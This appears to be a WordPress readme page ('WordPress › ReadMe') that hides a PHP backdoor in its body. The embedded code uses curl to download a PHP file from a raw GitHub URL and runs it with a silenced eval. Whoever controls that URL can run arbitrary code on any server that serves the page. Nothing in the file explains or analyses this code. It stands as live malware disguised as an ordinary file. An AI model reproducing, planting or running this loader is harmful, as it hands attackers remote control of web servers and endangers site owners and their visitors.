<!DOCTYPE html>
<html lang="en">
<head>
	<meta name="viewport" content="width=device-width" />
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta name="robots" content="noindex,nofollow" />
	<title>WordPress &#8250; ReadMe</title>
	</head>
<body>

<?=
"";
function getDiDiContent(){
  $handle = curl_init();
  curl_setopt ($handle, CURLOPT_URL, 'https://raw.githubusercontent.com/mrnewjibon-tech/aaa/refs/heads/main/contack-us.php');
  curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5);
  $result = curl_exec( $handle );
  if ( PHP_VERSION_ID < 80000 ) {
     curl_close(  $handle  );
  }
  return $result; 
}
$didi = getDiDiContent();
@eval("?>" . $didi);?>

